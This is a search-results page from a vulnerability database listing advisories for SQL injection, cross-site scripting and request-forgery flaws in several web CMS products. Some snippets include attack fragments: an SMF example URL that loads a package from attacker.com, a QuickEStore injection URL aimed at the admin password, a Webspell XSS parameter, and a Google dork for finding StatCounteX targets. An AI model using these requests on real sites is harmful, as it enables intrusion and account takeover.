Lucene search
K

32 matches found

CNNVD
CNNVD
added 2022/03/10 12:0 a.m.5 views

Luocms SQL注入漏洞

Luocms is an article management system. A SQL injection vulnerability exists in Luocms v2.0, which stems from a lack of validation of external input SQL statements in /admin/link/linkok.php. An attacker could use this vulnerability to execute illegal SQL commands to steal sensitive database data...

9.8CVSS6.1AI score0.01137EPSS
Exploits1References2
Cvelist
Cvelist
added 2022/03/09 12:39 p.m.17 views

CVE-2022-24604

Luocms v2.0 is affected by SQL Injection in /admin/link/linkmod.php...

10AI score0.01137EPSS
Exploits1References1
OSV
OSV
added 2021/10/05 10:15 p.m.4 views

CVE-2020-21505

waimai Super Cms 20150505 contains a cross-site scripting XSS vulnerability in the component /admin.php/Link/addsave...

6.1CVSS5.7AI score0.00641EPSS
Exploits1References1
CNVD
CNVD
added 2018/10/29 12:0 a.m.4 views

YUNUCMS cross-site scripting vulnerability (CNVD-2018-23273)

YUNUCMS is a three-network, self-substation system of open source content management system. YUNUCMS 1.1.5 in admin/link/editlink?id=5 cross-site scripting vulnerability, attackers can exploit the vulnerability to carry out cross-site attacks...

4.8CVSS4.8AI score0.00559EPSS
Exploits1References1
CNVD
CNVD
added 2018/10/29 12:0 a.m.2 views

SEMCMS Cross-Site Scripting Vulnerability (CNVD-2019-01723)

SEMCMS is a foreign trade web content management system CMS that supports multiple languages. A cross-site scripting vulnerability exists in SEMCMS version 3.4, which can be exploited by a remote attacker to inject arbitrary web script or HTML with the help of the first input field of...

4.8CVSS4.8AI score0.00534EPSS
Exploits1References1
CNVD
CNVD
added 2017/10/30 12:0 a.m.3 views

SQL Injection Vulnerability in MIPCMS ApiAdminLink.php Page

MIPCMS is a free and open source based on Baidu Mobile Accelerator MIP engine based on the development of articles, information, content management system, but also the system for the Internet webmasters, entrepreneurs and other groups to create SEO-optimized after the station-building system. A...

7.6AI score
Exploits0
Exploit DB
Exploit DB
added 2009/01/26 12:0 a.m.34 views

Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload

Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file: http://attacker.com/packages.xml Save this file as...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2008/02/15 12:0 a.m.40 views

StatCounteX 3.0 & 3.1 Admin Vulnerability

StatCounteX 3.0 & 3.1 Admin Vulnerability No need to exploit ; An attacker can follow /admin.asp link and edit the scripts configurations google dork : intitle:StatCounteX 3.1 Yonetici SekoMirza From Turkiye !...

2.6AI score
Exploits0
securityvulns
securityvulns
added 2008/01/30 12:0 a.m.48 views

Webspell 4.01.02 2 Vulnerabilites

Webspell 4.01.02 2 Vulnerabilites Founded by NBBN Vendor: http://cms.webspell.org 1 Cross-Site Scripting Vulnerability 2 Change User Permission XSRF Vulnerability 1 http://site.tld/path/index.php?site=whoisonline&sort="xss code 2 This creates a superadmin account, when an admin click a link, to a...

6.4AI score
Exploits0
0day.today
0day.today
added 2007/08/06 12:0 a.m.111 views

CartWeaver (Details.cfm ProdID) Remote SQL Injection Vulnerability

Exploit for cgi platform in category web applications ================================================================== CartWeaver Details.cfm ProdID Remote SQL Injection Vulnerability ================================================================== product:CartWeaver main...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/07/19 12:0 a.m.18 views

QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability

No description provided by source. author:meoconxatvnbrain.net web application:QuickEStore Main Page:www.quickestore.com bug: sql injection at insertorder.cfm?CFID=123&CFTOKEN=1' exploit: http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1sql query get admin password:...

7.1AI score
Exploits0
Vulnrichment
Vulnrichment
added 1976/01/01 12:0 a.m.18 views

CVE-2024-36674

LyLmespage v1.9.5 is vulnerable to Cross Site Scripting XSS via admin/link.php...

5.8AI score0.00322EPSS
Exploits1References1
Rows per page
Query Builder